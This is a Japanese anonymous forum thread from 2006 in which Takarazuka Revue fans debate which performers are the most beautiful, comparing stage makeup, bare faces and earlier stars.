328 :名無しさん@花束いっぱい。:2006/11/27(月) 15:33:42 ID:9ihYhD2l
美形=かしげ
可愛い=かなみん





329 :名無しさん@花束いっぱい。:2006/11/27(月) 16:21:18 ID:e3rZ2zu/
かしげは美人
ゆかりはアイリッシュ(一本一本ボンドで植え付ける睫毛)が
異様に目立つから微妙かも
眉月はオフは美人だけど舞台メイクすると顎が受け口っぽくなって
印象が薄くなる↓
舞台姿で文句いうならかしげのオデコの広さもヤバイけど…
何はともあれ宝塚の天然美人は貴重だお

330 :麗亜 ◆ysCBLmhzdM :2006/11/27(月) 16:23:14 ID:DEAd2yKV
やっぱ星組の綺華さんでしょう!!

331 :名無しさん@花束いっぱい。:2006/11/27(月) 16:32:48 ID:AjIoaL2T
美少女(将来の美人)なら花影アリスちゃん。
お人形のように美しい顔立ちだけでなく、
小顔で華奢な美少女体型で、
雰囲気も上品可憐な上、中性的で嫌みがない(お花様と同じ)。


332 :名無しさん@花束いっぱい。:2006/11/27(月) 16:47:28 ID:jlPwK61Z
春野寿美礼

333 :名無しさん@花束いっぱい。:2006/11/27(月) 17:01:08 ID:okDfG2rZ
自分が見た本で「歴代屈指の美貌」と書かれてたのは
秋篠美帆
檀れい

秋篠さんって綺麗だったの?
知らないので教えて。


334 :名無しさん@花束いっぱい。:2006/11/27(月) 17:12:20 ID:9ihYhD2l
檀ちゃんはわかるけど、秋篠さん程度だったら
ゴロゴロしてるような・・・
その本の人の好みだったのでは?
私も好みで言ってますがw

335 :名無しさん@花束いっぱい。:2006/11/28(火) 01:51:08 ID:ineY/YMw
KASHIGETOMOYOYUKARI

336 :名無しさん@花束いっぱい。:2006/11/28(火) 05:17:28 ID:oxbBOd0w
檀れいさん・貴城けいさん・眉月凰さん・綺華れいさん

337 :名無しさん@花束いっぱい。:2006/11/28(火) 18:57:56 ID:yrIDb7mL
>>333
普通のお顔で、もう一つ言えばフケ顔。

338 :名無しさん@花束いっぱい。:2006/11/29(水) 08:05:12 ID:Fe+Nn43b
秋篠さんの事聞いた者です。
“クレオパトラも違和感なく似合う美貌”みたいな書き方だったから、超絶美女かと思ってた。
そうなのかー。
勉強になりました。

339 :名無しさん@花束いっぱい。:2006/11/29(水) 13:07:55 ID:QVQVWqjz
秋篠さんはそこら辺にごろごろいるような美人ではなく
東京下町の出身で庶民的な美人ですよ

元理事長の公平さんがファンで誰からも愛されるキャラでした
おしゃべりで世話焼きで人が良くって・・・

実力は踊り駄目、歌まあまあ、芝居は寄り添い型で
ペイさんよりでしゃばらずに控えめでした

1回結婚離婚  by 元ファン

340 :名無しさん@花束いっぱい。:2006/11/29(水) 23:17:53 ID:IWucn6tP
檀ちゃん
綺華れいちゃん

・・どっちも芸名が同じだ
贔屓目で見たら「けい」の付く3人も美人だと思う

341 :名無しさん@花束いっぱい。:2006/11/29(水) 23:20:52 ID:84ou/cTJ
貴城けい。

342 :名無しさん@花束いっぱい。:2006/11/29(水) 23:23:58 ID:xEEoWMsX
妃鳳こころさん
入りで見たけど白くて綺麗だった。

343 :名無しさん@花束いっぱい。:2006/11/29(水) 23:31:02 ID:ha6vGPV2
ここは、檀ヲタのたまり場ですか?w
ほんとに屈指の美貌だったら、下手糞でもビリでも下級生から抜擢されてるはず。
実際、秋篠さんもビリだったけど、ずーっと下級生から抜擢されてるヒロイン候補だった。
ほさちも鮎ちゃんもそうだし、美貌ってのはこのレベルだよ。
檀ちゃんは下級生時代は脇役やってたしスルーされてたw
たまたま、新公ヒロインともの好きのまみのせいで、トップになったが、たまたま。
檀ちゃんの美貌は、貴柳さんとかゆらさんとかああいうタイプ。ヒロインではない。

344 :名無しさん@花束いっぱい。:2006/11/29(水) 23:35:39 ID:84ou/cTJ
>>343
スレ違いです。

OGジェンヌをマターリ語れ

http://hobby8.2ch.net/test/read.cgi/siki/1164538774/l50


345 :名無しさん@花束いっぱい。:2006/11/29(水) 23:38:21 ID:xEEoWMsX
抜擢は時代にもよると思う。
今は利益でかなり動いていますから、ただ綺麗なだけじゃ
路線扱いされません。

346 :名無しさん@花束いっぱい。:2006/11/30(木) 00:07:48 ID:WFnCR8CV
純花まりい、かなり可愛いけど檀ちゃんより何もできない。
表情すらない。
可愛くてもまりいレベルだと抜擢できないんだろうな。

347 :名無しさん@花束いっぱい。:2006/11/30(木) 00:15:48 ID:fdrS5SKx
まりいは化粧顔がメイクダウンで勿体ないなーと思う。
月のコモ姐さんのように、いきなり新公卒業してから役付が良くなったりしないかな。



348 :名無しさん@花束いっぱい。:2006/11/30(木) 00:59:19 ID:2owkqIC/
まりいは可愛いね。美少女。
新公卒業した辺りから美女に化けて欲しいな。


349 :名無しさん@花束いっぱい。:2006/11/30(木) 23:37:42 ID:mVjSUpyF
ヅカはまりたての頃、わ〜びじーん!って
思ったのが、かしちゃんだった。

350 :名無しさん@花束いっぱい。:2006/12/01(金) 02:00:52 ID:b9UaBgKb
舞台でだったら、
すみれ様のホルニヒ役の時の超絶美少年ぶりには釘付けになったな…(遠い目)。
清水玲子の漫画「月の子」のセツにぴったりだと思った。
儚げな美少年から人魚姫に変身する、神秘的な両性具有のキャラに。
ひそかに、双子の兄弟ティルトはみず様で舞台化して欲しいと思っていた。

351 :名無しさん@花束いっぱい。:2006/12/01(金) 08:58:27 ID:6Hc6DElx
まりいちゃんは表情をまず身に付けなきゃ。妃鳳こころちゃんはハーフみたいで綺麗&可愛いけど
地味なのかな?パッと印象に残るタイプじゃないよね。

素顔見てうわっ!って圧倒された美人はかしげ、檀、妃里、眉月。


ってかかしげってきっと生まれてからずっと
「美人」って言われまくってるんだろうな・・・ウラヤマスイ

352 :名無しさん@花束いっぱい。:2006/12/01(金) 17:26:22 ID:hevpk75D
かしげのねぇちゃん
都々城あい

これほどの美人姉妹は中々居ない

353 :名無しさん@花束いっぱい。:2006/12/01(金) 17:27:43 ID:hevpk75D
ちょwごめそあげちゃった

354 :名無しさん@花束いっぱい。:2006/12/01(金) 18:04:09 ID:IWAdf+wY
素顔が美人でも舞台で映えない人もいるよね。
やはり映像とは違うのね、と思うけど、
大昔の映画界に行った娘役、八千草薫とか扇千景とか浜ゆうことかは
素顔も舞台も映像もすごくきれいだよね。

355 :名無しさん@花束いっぱい。:2006/12/01(金) 21:33:04 ID:jciWtuVB
前にスマステで宝塚特集やってた時チラッと写真で映った八千草薫。
すごい美人でびっくりした。
スパニッシュなショールかけてる写真だった。

356 :名無しさん@花束いっぱい。:2006/12/01(金) 23:51:25 ID:yur4X4VT

貴城けいさん
綺華れいさん

357 :名無しさん@花束いっぱい。:2006/12/02(土) 04:56:23 ID:Kp7SlhS1
ともよさん。今日ナウオン見てたら断トツで綺麗だった!

358 :名無しさん@花束いっぱい。:2006/12/02(土) 13:12:41 ID:4ZfemomR
お食事会で見て美人だと思ったのは、かしげ、ゆかりだな。

そういう場で見ると二人とも華とオーラがあった。
なんで舞台では地味なのかってくらい。
でもって、どんなに取り繕っても、二人とも口を開くと頭悪そうだったw

359 :名無しさん@花束いっぱい。:2006/12/02(土) 14:28:44 ID:08MpWOok
CSニュースで理事のオフ、和、洋の三連発を見た
どれも綺麗で華やか。つくづく得な顔立ちだと思った

かなめちゃんも綺麗な人だから楽しみにしてたんだけど
今回の新公はメイクのせいか普通っぽかったので残念

360 :名無しさん@花束いっぱい。:2006/12/02(土) 17:37:35 ID:XM9ZIdhx
かしげ、ゆかり、檀、かなめ…辺りが憧れる美人かなぁ。頭悪そうでも、歌がいまいちでも、踊れなくても美貌ってタカラヅカには一番大事じゃない?w

361 :名無しさん@花束いっぱい。:2006/12/02(土) 18:27:23 ID:otzlwL3D
顔だけなら普通に檀れい

362 :名無しさん@花束いっぱい。:2006/12/02(土) 19:41:04 ID:0bUxBtHN
理事さん 綺麗でいろっぽくて カッコイイ!

363 :名無しさん@花束いっぱい。:2006/12/02(土) 20:06:53 ID:4ZfemomR
理事は写真で見ると美人だけど
間近で会って話をすると、口角下がっていて、目線がうつろで美人には思えなかった。

364 :名無しさん@花束いっぱい。:2006/12/02(土) 20:14:52 ID:mJ63Q7ep
万里柚美、鮎ゆうき、檀れい、妃鳳こころ、純花まりい

365 :名無しさん@花束いっぱい。:2006/12/02(土) 20:37:54 ID:ot5pdZke
>363
どの理事?
轟理事なら口角下がりようがないけど・・

366 :名無しさん@花束いっぱい。:2006/12/02(土) 21:22:46 ID:4ZfemomR
>>365
轟の理事。口角下がってましたよ。

367 :名無しさん@花束いっぱい。:2006/12/02(土) 22:24:30 ID:VYbkgOgU
マジレスバロスw
口角がどうであろうが理事は(轟の方w)美しかったぞ。
一度でも間近で見れて良かったと感動した

368 :名無しさん@花束いっぱい。:2006/12/02(土) 22:37:11 ID:VniuhIV+
理事はあの年であんだけ綺麗なら十分でしょ
舞台映えのする華やかな顔

それにしても八千草薫、扇千景の若かりし頃は凄い!
今はここまでの美人はいないね

369 :名無しさん@花束いっぱい。:2006/12/03(日) 04:58:37 ID:f6YnCTuW
貴城さん。眉月さん。

370 :名無しさん@花束いっぱい。:2006/12/03(日) 11:19:12 ID:vj5MgkND
昔の写真て、あんまり真実を写してないんだよなぁ。
白黒写真て、照明とかで、なんとでもごまかしきくんだわ。
ばあちゃんが、若かりし日、
写真館でとったというしゃしん、
色白で、日活スターのようでしたが、
実際のばあちゃんは、畑仕事で日焼けした
ただの田舎のかあちゃんでした。
八千草さんは、ほんと美しいかただと思いますが
実際に、その時代に生で見ることが出来たとしたら、
普通の美人だったんじゃないかな。

371 :名無しさん@花束いっぱい。:2006/12/03(日) 11:38:38 ID:KHoKN6+I
でもさ今でも品があって綺麗じゃない?
やっぱり昔も綺麗だったと思うよ

372 :名無しさん@花束いっぱい。:2006/12/03(日) 12:33:02 ID:bEdVtXJm
八千草さんは最初の頃、子役が多かったらしいが
可愛くて、可愛くていつも大道具のお兄さん達が
袖に群がってたという伝説があるくらい。

今そんな人、いないでしょうに。

373 :名無しさん@花束いっぱい。:2006/12/03(日) 17:13:05 ID:rnQ54nAe
トドさんは 外人女優みたいな(ガルボやディートリッヒ)美人だから 希少価値だよね

374 :名無しさん@花束いっぱい。:2006/12/03(日) 18:27:54 ID:k3r2Wg04
>>372
最近の子と違ってスレてなくて、美しさが際立つんだろうね。
やっぱ内面の美しさも大事だと思う。
今の子も内面が汚いわけじゃないだろうけど、内から出るオーラってあるよね。

375 :名無しさん@花束いっぱい。:2006/12/03(日) 20:57:37 ID:2kBFprQV
今は美人は芸能界に行くけど、八千草さんの時代は
芸能界はダメだけど、宝塚ならOKという家庭の方が多かった。
と、祖母が言っている。

376 :名無しさん@花束いっぱい。:2006/12/03(日) 21:42:44 ID:HTfUeT4i
>373
確かに理事はヅカメイクすると欧米系の外人に近くなる
たいていの人はアジア系の美人
どちらも綺麗だと思う

377 :名無しさん@花束いっぱい。:2006/12/03(日) 21:58:06 ID:c69gp/lW
確かにデートリッヒに似てるよね>理事

378 :名無しさん@花束いっぱい。:2006/12/03(日) 22:29:42 ID:lCAJXNIQ
麻乃佳世ちゃんが美人だと思う。
ハーミアなんて最高だった。

379 :名無しさん@花束いっぱい。:2006/12/04(月) 03:08:05 ID:IvVHETUO
あの人は、伊佐治とか似合ってたし、時代劇の顔にもなるよね。

380 :名無しさん@花束いっぱい。:2006/12/04(月) 04:52:47 ID:1vp83upV
かしげともよだんゆかり

381 :名無しさん@花束いっぱい。:2006/12/04(月) 23:18:57 ID:0JBVIAob
>379
2枚目だけどそれは男優だ
時代劇女優の格好をしたら絶対へんてこになる
クラシカルな洋画に出てくるような女優なら似合いそう

382 :名無しさん@花束いっぱい。:2006/12/04(月) 23:48:46 ID:LYVczPVC
あやか れいさん、檀さんは星組名物だったよね〜

383 :sage:2006/12/05(火) 00:56:38 ID:77dgUHLD
こころちゃんは手で顔以外の部分を隠して見るとパーツがキレイで整ってるからすごい美人だなと思う。
少し惜しいのはなぜだろう?眉?髪色?輪郭?
もったいない。

あと、美人かは人それぞれの好みだと思うけど、退団しちゃった愛紗ももちゃんもお顔キレイでした。
妃宮さくらちゃんも音楽学校時代は今より華奢で、歯をかくせば美人でした。眉がちょっと残念でしたけど。

384 :名無しさん@花束いっぱい。:2006/12/06(水) 11:26:15 ID:wGH1pkpM
雪組 剣崎さん!
印象的な、濃い美人顔

385 :名無しさん@花束いっぱい。:2006/12/06(水) 22:00:00 ID:zdBxAh6B
☆ファンの私は、ゆかりちゃんが美人!

386 :名無しさん@花束いっぱい。:2006/12/06(水) 22:58:54 ID:Ej5N9ZM9
友会トークショーで、えりたんに新公のお化粧を見てもらったコマが、
“壮さんって(顔のパーツが)左右対称で、ほっんとにきれいなんですよ〜”と
いっていた。
「えりたん美人説」の所以をきいたような気がした・・・。


387 :名無しさん@花束いっぱい。:2006/12/06(水) 23:55:19 ID:WEWG72mh
美人→かしげ、檀  美青年→理事  美少年→ゆかり 美少女→アリス

388 :名無しさん@花束いっぱい。:2006/12/07(木) 00:13:54 ID:b7B0UXd9
確かにソウって顔だけ見ると美人だ。
だけど全身で見ると首が長いっていうか肩がないから
ミーアキャットとかカワウソに見える。


389 :名無しさん@花束いっぱい。:2006/12/07(木) 08:23:27 ID:MNB28S+p
かしげ、ゆかりは「美人」
理事、はまこ、壮は「整った顔」
って感じ。

390 :名無しさん@花束いっぱい。:2006/12/07(木) 12:12:11 ID:ynXjlxnh
384 私も他目当ての入り待ち中 真近を通って わっきれいな子!誰!って思って聞いたら研1の剣崎さんだった。彼女舞台でもきれいな笑顔だよ

391 :名無しさん@花束いっぱい。:2006/12/07(木) 15:26:59 ID:jaRFOUVR
美形→かしげ、理事
美人→檀ちゃん、ゆかり
美脚→ぶっさん、華城
南国美人(前に出てたけどピッタリな表現だと思う)→ハマコ

392 :名無しさん@花束いっぱい。:2006/12/07(木) 16:58:51 ID:OpZp5gbE
壮ちゃんみたいな、お鼻が低めで小作りなお顔の人は、
私は「美人」とは思わないな。
「かわいい」とか、「きれい」くらいならあれだけど。
やはり「美人」まで行く人は、目が大きく、鼻が高く、
輪郭もきれいなイメージです。

393 :名無しさん@花束いっぱい。:2006/12/07(木) 18:02:36 ID:Jr7rdYzw
壮は写真で見るととんでもなくぶっさいくに見える時がある。
舞台顔はチョー美人。

394 :名無しさん@花束いっぱい。:2006/12/07(木) 18:55:54 ID:rSIv0eGk
壮くんはなかなかの美人さんだと思うけどな・・・
舞台顔の方が綺麗なのは確か

オクにずらっと入り写真が出ていた
あいちゃん、笑顔がとってもキュート!
理事は本当に美形。美女というか美男というか・・・

395 :名無しさん@花束いっぱい。:2006/12/07(木) 19:13:48 ID:0A4XYV34
顔は涼しげなのに、トークは暑苦しい&オサレセンスは寒い壮君は
なかなかの美人さんだと思います♪
お肌も白くてつるるるるん☆

396 :名無しさん@花束いっぱい。:2006/12/07(木) 23:53:36 ID:nIiuEhLM
>やはり「美人」まで行く人は、目が大きく、鼻が高く、
>輪郭もきれいなイメージです。

まさしく、そのとーりだと思う!!
輪郭ってのが(横顔がわかりやすい)かなり重要かもね!
この辺を落としても雰囲気がキレイと感じるのは
ジェンヌならほとんど該当するよね♪

397 :名無しさん@花束いっぱい。:2006/12/08(金) 00:28:17 ID:Br3HwaEz
うーん…ゆかりって美人なのか。
入りで見るとなんか肌とかひどくてガッカリしたんだが…。
肌と言えば理事もだな。
あとガイチも美人だったがやっぱり…。

398 :名無しさん@花束いっぱい。:2006/12/08(金) 01:07:26 ID:9HjcYmVv
ユカリさんの入りはよく遭遇したけど色黒ってだけで、すっぴんでも肌荒れしてないほうじゃん?小顔で鼻がすごい高い人ってのが印象的だった

399 :名無しさん@花束いっぱい。:2006/12/08(金) 03:17:09 ID:zd3/N6NX
城咲さんの笑顔怖い。。。

400 :名無しさん@花束いっぱい。:2006/12/08(金) 05:57:21 ID:zXYt1ffJ
理事って「美人」だとは思うけど「美女」って感じじゃないのは
何でかな?

401 :名無しさん@花束いっぱい。:2006/12/08(金) 07:02:51 ID:vi25wtwP
かしげは顔もきれいだけど肌もきれいだね

402 :名無しさん@花束いっぱい。:2006/12/08(金) 07:07:41 ID:86QABc0k
ニュースに出たトークショーのかしげ
特に美人には見えんかった
生で見ると違うんだろうか?
とりあえずデコ隠した方がいいんじゃね?

403 :名無しさん@花束いっぱい。:2006/12/08(金) 07:16:25 ID:ZK2EFJSr
カシゲは顔に似合わないハスキーボイスが堪らないのさ。

404 :名無しさん@花束いっぱい。:2006/12/08(金) 07:33:57 ID:6fQULBWb
今はやつれちゃってるからね。
少しお肉が戻ればまたオーラが復活するとおも。
個人的には特出の頃のかしげが
全体的に見てもすごくきれいで好み。

405 :名無しさん@花束いっぱい。:2006/12/08(金) 07:56:12 ID:kgVkpzIz
お肉つくより先に、退団者オーラが出てくるよ(´;ω;`)

>>400
私はイシさんの薄い唇に中性を感じるな。
中谷美紀も同様。

406 :名無しさん@花束いっぱい。:2006/12/08(金) 08:12:31 ID:kgVkpzIz
連投ごめん。
自分の中の「美女」は檀ちゃん。
「美人」はかしちゃん、ゆかりちゃん、イシさん…など。
やっぱりどんなに綺麗でも男役は基本「美人」。
あるいは「麗人」とか。

407 :名無しさん@花束いっぱい。:2006/12/08(金) 15:42:34 ID:JyEckDBo
>>397
ゆかりは美人だと思う。
あの顔だから今の扱いだって自覚してるから、肌も綺麗だよ。
色はもうちょっと白くなってもいい気がするけどw

408 :名無しさん@花束いっぱい。:2006/12/08(金) 20:42:04 ID:IpCjUYig
妃鳳こころさん。
欧米系の血が入ってるのかというような、きれいな顔立ち。
惚れ惚れします。

409 :名無しさん@花束いっぱい。:2006/12/09(土) 01:59:56 ID:4VjcsRPn
美人スレ常連の濃ゆぃ2ショット狽ゥしげゆかりhttp://n.pic.to/9o26y

410 :タ〇タン:2006/12/09(土) 02:07:01 ID:pBpGjRwC
リサタン。栗栗のお目目と高い鼻に一目惚れですた。そんなリサタンのミリキにいち早く気付いた俺ってセンス良いよ〜! へ(* ̄ー ̄)>

411 :名無しさん@花束いっぱい。:2006/12/09(土) 02:48:30 ID:pBpGjRwC
age

412 :名無しさん@花束いっぱい。:2006/12/09(土) 11:05:01 ID:2GzhIZeK
壇れいさん。今ニュースで着物着てるの見て、釘付けになった。
ヅカはみたことないけど、あんなに綺麗な人の舞台ならみたかった

413 :名無しさん@花束いっぱい。:2006/12/09(土) 19:46:57 ID:5BElBoRY
春野寿美礼

414 :名無しさん@花束いっぱい。:2006/12/09(土) 19:53:12 ID:5lgeEApA
413
スレ違い。

415 :名無しさん@花束いっぱい。:2006/12/09(土) 23:20:24 ID:U14N3q2O
>412
舞台は見ない方が良いよ。
映像は編集出来る
舞台は編集出来ない

416 :名無しさん@花束いっぱい。:2006/12/09(土) 23:41:43 ID:M4NLxfdC
>412
檀ちゃんの舞台なら、王家や長崎がいいと思う
この時の芝居はなかなか上手かった

417 :名無しさん@花束いっぱい。:2006/12/12(火) 07:14:05 ID:XY4DWY86
タータン

418 :名無しさん@花束いっぱい。:2006/12/12(火) 09:19:12 ID:FAktqOlA
お前の目は節穴か…?

419 :名無しさん@花束いっぱい。:2006/12/12(火) 09:37:42 ID:KQU2smjo
春野寿美礼

420 :名無しさん@花束いっぱい。:2006/12/12(火) 10:16:24 ID:JmTATWbv
檀れい・白城あやか (かわいい正統派美人)
貴城けい・早霧せいな(パーツくっきり色白美人)
綺華れい      (外人モデル風クール美人)

あっ、宙組と星組が優勢??

421 :名無しさん@花束いっぱい。:2006/12/12(火) 23:57:31 ID:2mrN/Ctm
ENAKのかしちゃん本当に綺麗!大劇千秋楽おめでとう!

422 :名無しさん@花束いっぱい。:2006/12/13(水) 00:27:12 ID:MV2DHHcy
なんといっても檀れいさんでしょう。

423 :名無しさん@花束いっぱい。:2006/12/13(水) 08:06:18 ID:N4fusmAR
ふうがみなと

424 :名無しさん@花束いっぱい。:2006/12/14(木) 00:44:06 ID:maPNOqup
今日、月の麻華りんかさんを間近で見かけたが、とても大人っぽくてキレイだった。昔のイメージと随分違ってびっくりした。

425 :名無しさん@花束いっぱい。:2006/12/14(木) 01:26:56 ID:CMF69HJP
でも美人じゃないよね。

426 :名無しさん@花束いっぱい。:2006/12/14(木) 13:05:05 ID:d2x2iEbp
キレイなジェンヌは沢山いるけど美人となると更に格が上だよね〜!やっぱ綺華れいちゃんとか、檀ちゃんとかは凄い美貌〜

427 :名無しさん@花束いっぱい。:2006/12/14(木) 15:48:22 ID:CMF69HJP
生でジェンヌを見ると、大抵「うわぁ、綺麗」「美人!」って思うけど
写真や映像で見ても同じ事を思う人って少ない。
ジェンヌはジェンヌオーラで綺麗に見えているのが大きい。

それでも美人だと思うのは、散々既出の、ほさち・檀・かしげ・綺華

428 :名無しさん@花束いっぱい。:2006/12/14(木) 18:20:38 ID:gBHlDw+G
だなー。生で見ると、きたろうだってうわぁ美人!って思うもん。

429 :名無しさん@花束いっぱい。:2006/12/14(木) 20:24:16 ID:4NRwtJt4
かしげが一番

430 :名無しさん@花束いっぱい。:2006/12/14(木) 21:15:26 ID:Q5IGQL/q
生で見ると誰もがキレイより「うわっ細っ!」と思う。
もちろん皆さんキレイだけど♪
特に美人なのは、、、、、最近の入り出、限定だと、、

かしげ、ゆかり、きりやん、となみ



431 :名無しさん@花束いっぱい。:2006/12/14(木) 22:42:52 ID:wqq2xr42
424さん
私も今日、麻華さんを偶然見かけましたが、美人さんだな〜と思いましたよ。目がとても大きくて、驚きました。
美人で思いつくのは、かしげさん、ゆかりさん、となみさん、るいさんなど…。本当、ジェンヌさんって色白で、不思議なオーラが出ていて綺麗ですよね。

432 :名無しさん@花束いっぱい。:2006/12/15(金) 00:07:34 ID:h1z4wYMb
かざりじん

433 :名無しさん@花束いっぱい。:2006/12/15(金) 12:53:47 ID:ByJKUe6/
やっぱりかしげかな。
でも、みんなの予想を覆す意味できりやん。
きりやんは舞台映えが…なだけで素美人だと思うよ。

434 :名無しさん@花束いっぱい。:2006/12/15(金) 14:14:27 ID:ZGJGp8p6
貴城けい

435 :名無しさん@花束いっぱい。:2006/12/16(土) 23:35:20 ID:VMGz3Oyd
キレイ、というだけならたくさんいるけど
インパクトのある美人というとかしげだなぁ。

436 :名無しさん@花束いっぱい。:2006/12/17(日) 17:21:25 ID:JVltfIyL
前髪おろしたかしげ・ばっちりメイクのゆかり

437 :名無しさん@花束いっぱい。:2006/12/17(日) 20:38:27 ID:Yu9F58Ie
トークショーに映っていた理事が綺麗かった

438 :名無しさん@花束いっぱい。:2006/12/18(月) 00:30:58 ID:P6rnUu98
そっかー?
理事にしては、あまりイケて無いほうかと…

439 :名無しさん@花束いっぱい。:2006/12/18(月) 00:45:18 ID:QFmjZYKl
今回のトドはビューティホーだった
痩せすぎの時はイマイチ
それにしても随分女っぽくなったもんだ

440 :名無しさん@花束いっぱい。:2006/12/18(月) 02:04:16 ID:oh1vDE/1
貴 城 け い

441 :名無しさん@花束いっぱい。:2006/12/18(月) 15:57:47 ID:VwT5P2Fx
理事さん、トークショーきれかった・・
薄い化粧で色目のない服で光物に頼らないでかもし出す雰囲気だけで
上品でオーラがあった。やっぱ、美人。

442 :名無しさん@花束いっぱい。:2006/12/18(月) 19:18:33 ID:J1uGq/yj
>441
服はシンプルだったけど、光物はじゃらじゃらといっぱい付けてたやんw
あれ見てやっぱ金持ちだと思った
仕草とかは上品そうだけど、どっちかっていうと華やかな美人かな

443 :名無しさん@花束いっぱい。:2006/12/18(月) 19:57:28 ID:yV8XJgBu
かしちゃんって、パーツが絶品なのに、左右の配置が信じられないぐらい違う。
完全対称の人はいないにしても、なぜあんなにズレちゃうんだろう
と、タモさんもそう思った

444 :名無しさん@花束いっぱい。:2006/12/18(月) 21:30:29 ID:Ua5lCsjj
かしげの場合、首をかしげてる感じで曲がってるからでしょ。
愛称もそこからきてるから相当年季入ってそう・・・。

タモの場合は口の位置からして違う。
ちなみにオサも。

445 :名無しさん@花束いっぱい。:2006/12/18(月) 22:15:14 ID:P6B9311J
オサは美人とは言えない

446 :名無しさん@花束いっぱい。:2006/12/19(火) 07:10:47 ID:cMLey0Lx
花 純 風 香

447 :名無しさん@花束いっぱい。:2006/12/19(火) 13:39:32 ID:M9dUs89U
オサミズ以外はみんな美人

448 :名無しさん@花束いっぱい。:2006/12/19(火) 13:53:25 ID:9G2pgf4E
http://atq.ck.valuecommerce.com/servlet/atq/referral?sid=2219441&pid=874302784&vcptn=blog%2Fp%2FdSfxN_Fm3N_yVt5whufQMESbfDNi

449 :名無しさん@花束いっぱい。:2006/12/19(火) 23:39:59 ID:IdJeQUjw
花組 りせ
月組 みほこ
星組 ゆかり
雪組 ラギ 
宙組 かし

平均点が高いのは雪組の娘役全般は美人だと思う

450 :名無しさん@花束いっぱい。:2006/12/20(水) 00:57:38 ID:HZemhFA6
タカラヅカの人はフツーに全員美人でしょー
同性の目から見てかっこいい美人で思い浮かぶのは、
かしげさん、ゆかりさん辺りかな。
男役はタッパあるから、それだけでも良く見えてしまうけど
美人(美形)は一生の得だね〜

451 :名無しさん@花束いっぱい。:2006/12/20(水) 00:58:00 ID:sS0HSGHX
>449
ビミョン

452 :名無しさん@花束いっぱい。:2006/12/20(水) 03:48:55 ID:1ko+S7BM
>450
そーでもないよ。
大半のジェンヌが「私はタカラジェンヌよ♪美人なのよ♪♪」
って感じの美人オーラを出してるからそのオーラと雰囲気で錯覚するけど。

453 :名無しさん@花束いっぱい。:2006/12/20(水) 14:23:58 ID:oc3wHFZ0
>>450
ジェンヌの大半は雰囲気美人ですよ。

454 :名無しさん@花束いっぱい。:2006/12/20(水) 20:18:49 ID:q50cFUlx
羽桜しずく
・・・ダメかな。

455 :名無しさん@花束いっぱい。:2006/12/21(木) 06:23:48 ID:rR5/ddhI
>>454
おとめで確認したら美人つーより可愛いタイプじゃない?

おとめってさ撮影時は全員黒髪なんかな??
茶髪だと、それこそオーラでごまかせるけど黒髪だったら
素材が一目瞭然やね。

456 :名無しさん@花束いっぱい。:2006/12/21(木) 14:01:24 ID:iMam0Qhm
このスレではかしげ大人気だなww

457 :名無しさん@花束いっぱい。:2006/12/21(木) 16:02:32 ID:rzHOs41G
GRAPH1月号で、かしちゃんが自分の代々のおとめ写真を見て、
年々アイメイクが濃くなっているって言ってたけど、すっぴんだと
別人だったりするのかな?アイメイクは重要だよね。

458 :名無しさん@花束いっぱい。:2006/12/21(木) 20:01:35 ID:cTXEbZDj
天野ほたる。
美人だけど舞台ではさほど目立たないのは何故。

459 :名無しさん@花束いっぱい。:2006/12/21(木) 20:04:06 ID:iMam0Qhm
>>457
かしげはすっぴんでもさほど変わらないよ。
色白で相変わらずの美人です。
普段も化粧濃くないしね…

460 :名無しさん@花束いっぱい。:2006/12/21(木) 23:15:01 ID:PZF5Cc9P
星組の綺華れいさん
こんな美人が星組にいるなんて驚いた!

461 :名無しさん@花束いっぱい。:2006/12/21(木) 23:50:23 ID:IxKfs3GJ
轟さん 美人ですんごくかっこ良くて憧れます!外国女優みたい!

462 :名無しさん@花束いっぱい。:2006/12/22(金) 00:44:48 ID:r0n+gYkV
kashige

463 :名無しさん@花束いっぱい。:2006/12/22(金) 01:15:16 ID:YbV7tiLW
>>455
茶髪くらいならOKな年もあったけど、悲惨だったよ。
なんか安っぽくてしまりがなかった。

464 :名無しさん@花束いっぱい。:2006/12/22(金) 01:19:58 ID:aHF8aSoJ
やっぱり袴には黒髪が映えるもんね

465 :名無しさん@花束いっぱい。:2006/12/22(金) 02:39:38 ID:mBp6n3nr
おとめ、昔の白黒写真に戻して欲しいのは少数派かな?

466 :名無しさん@花束いっぱい。:2006/12/22(金) 19:40:59 ID:2B28SAVs
(●▽●)ここのスレはボクのためのスレでつか?

467 :名無しさん@花束いっぱい。:2006/12/23(土) 01:59:57 ID:1ls7BLvu
>>457
すっぴんかしげ、かしげのPB2で見れるよ。
みんなで年越しそば食べてるプライベートショットがある。
ん?誰?って一瞬思うけど、やっぱり綺麗だ〜

468 :名無しさん@花束いっぱい。:2006/12/25(月) 12:01:35 ID:tXFc05nJ
>>459
かしちゃん、化粧濃いと思うよ。本人も言っているように
特にアイメイクが。今は眉毛もほとんどないよね。

>>467
PB2の年越しそば食べてる写真って、まったくのすっぴんなのかな?
だったら、化粧してるときとあまり差はないね。


469 :名無しさん@花束いっぱい。:2006/12/25(月) 12:32:32 ID:0udyLoKJ
化粧が濃くても美人ならいいよ、ケバくなってなければ。
そういう意味でも、かしちゃんとゆかりは美人。

路線の上級生って、どうして眉毛をあんなに細くかくんだろう。
細すぎてメイクダウンしている人が結構いる。

470 :名無しさん@花束いっぱい。:2006/12/26(火) 08:47:31 ID:xi2Fr70t
私もかしちゃんと、ゆかりちゃんは肌もキレイだし特別美人度が高いと思う
二人が髪伸ばしたらどんな感じだろう〜
ゆかりちゃんは身長的にも見た目もエビちゃんよりサマになりそう
cancamやJJモデルっぽい美人ジェンヌさん
(贔屓は全く名前があがらないスレ…)

471 :名無しさん@花束いっぱい。:2006/12/26(火) 09:01:55 ID:/uVXpYjg
ここのスレ見ていたら
美人と人気は正比例しないことがわかるね

472 :名無しさん@花束いっぱい。:2006/12/26(火) 09:40:33 ID:xGNULbGW
美人な男役のネックは美人........(同性は美人がきらい?)
ミズ、コム、わたる、たかこが整ってる美人だったら.....

けど宝塚で過ごす年数より女性として過ごす年数のほうが長いんだし
人気うんぬんよりフツーに美人は羨ましい<かしげ・ゆかり
(スレタイトルに忠実に書いてみた)

473 :名無しさん@花束いっぱい。:2006/12/26(火) 14:00:31 ID:+rlTJXjT
ミズは男顔として見たら整ってるほうかなと思う。
少数派なのは重々承知。

474 :名無しさん@花束いっぱい。:2006/12/26(火) 22:23:56 ID:1wWsJ4ej
>>473
スレ違い。

475 :名無しさん@花束いっぱい。:2006/12/27(水) 18:24:04 ID:OdRmCf9c
早霧せいなさん。
望海風斗さん。
雛月乙葉さん。

